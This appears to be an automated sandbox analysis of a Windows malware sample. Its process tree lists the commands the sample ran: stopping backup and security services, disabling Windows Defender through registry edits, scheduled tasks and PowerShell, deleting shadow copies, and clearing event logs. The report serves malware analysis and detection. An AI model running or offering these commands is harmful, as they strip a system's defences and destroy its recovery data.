5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 3480 wrote to memory of 60 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 3480 wrote to memory of 60 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 60 wrote to memory of 1300 60 net.exe net1.exe PID 60 wrote to memory of 1300 60 net.exe net1.exe PID 60 wrote to memory of 1300 60 net.exe net1.exe PID 3480 wrote to memory of 948 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe sc.exe PID 3480 wrote to memory of 948 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe sc.exe PID 3480 wrote to memory of 948 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe sc.exe PID 3480 wrote to memory of 2380 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe sc.exe PID 3480 wrote to memory of 2380 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe sc.exe PID 3480 wrote to memory of 2380 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe sc.exe PID 3480 wrote to memory of 2356 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe sc.exe PID 3480 wrote to memory of 2356 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe sc.exe PID 3480 wrote to memory of 2356 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe sc.exe PID 3480 wrote to memory of 1848 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe"C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3480 -
C:\Windows\SysWOW64\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1292 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:3484
-
C:\Windows\SysWOW64\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1248 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:2548
-
C:\Windows\SysWOW64\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3700 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:2500
-
C:\Windows\SysWOW64\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3652 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:3268
-
C:\Windows\SysWOW64\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:2112
-
C:\Windows\SysWOW64\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:328 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1788
-
C:\Windows\SysWOW64\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3328 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:3872
-
C:\Windows\SysWOW64\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3676 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:956
-
C:\Windows\SysWOW64\net.exenet.exe stop "UnistoreSvc_13561" /y2⤵
- Suspicious use of WriteProcessMemory
PID:60 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_13561" /y3⤵PID:1300
-
C:\Windows\SysWOW64\sc.exesc.exe config "SamSs" start= disabled2⤵PID:948
-
C:\Windows\SysWOW64\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:2380
-
C:\Windows\SysWOW64\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:2356
-
C:\Windows\SysWOW64\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1848
-
C:\Windows\SysWOW64\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:4048
-
C:\Windows\SysWOW64\sc.exesc.exe config "VSS" start= disabled2⤵PID:1772
-
C:\Windows\SysWOW64\sc.exesc.exe config "wbengine" start= disabled2⤵PID:3128
-
C:\Windows\SysWOW64\sc.exesc.exe config "WebClient" start= disabled2⤵PID:3004
-
C:\Windows\SysWOW64\sc.exesc.exe config "UnistoreSvc_13561" start= disabled2⤵PID:1324
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1524
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1384
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:2132
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:3196
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:2676
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1680
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:2860
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:2884
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:2668
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:2548
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1548
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:2500
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:600
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:2112
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:3040
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:2864
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:364
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:684
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1992
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:332
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:2556
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:3952
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:2120
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:2224
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3132 -
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3124 -
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1520 -
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2276
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3536
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3204
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4020
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:3824 -
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:952
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:3512 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3496 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:528 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3616 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4080 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3120 -
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:3928
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1496 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1784
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1764 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:816
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3388
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
1c19c16e21c97ed42d5beabc93391fc5
SHA18ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA2561bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA5127d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c
-
MD5
46213c672e82f1f8c20669652a1606a5
SHA1b0c123a57ae84b56a8559c4c964066274e2d1ad4
SHA2567d8e1c5b27262d3330fd6535755326519e523f27946933e7352d9c681a3b3d71
SHA512c58884ac19a9069d93916bb4fea48579d6ce653822b5ab1fb5ca146747bd4707600886d9febe2a810e3699aca3e8ecf9184f340f6ca6f6461329c551d1ef6b45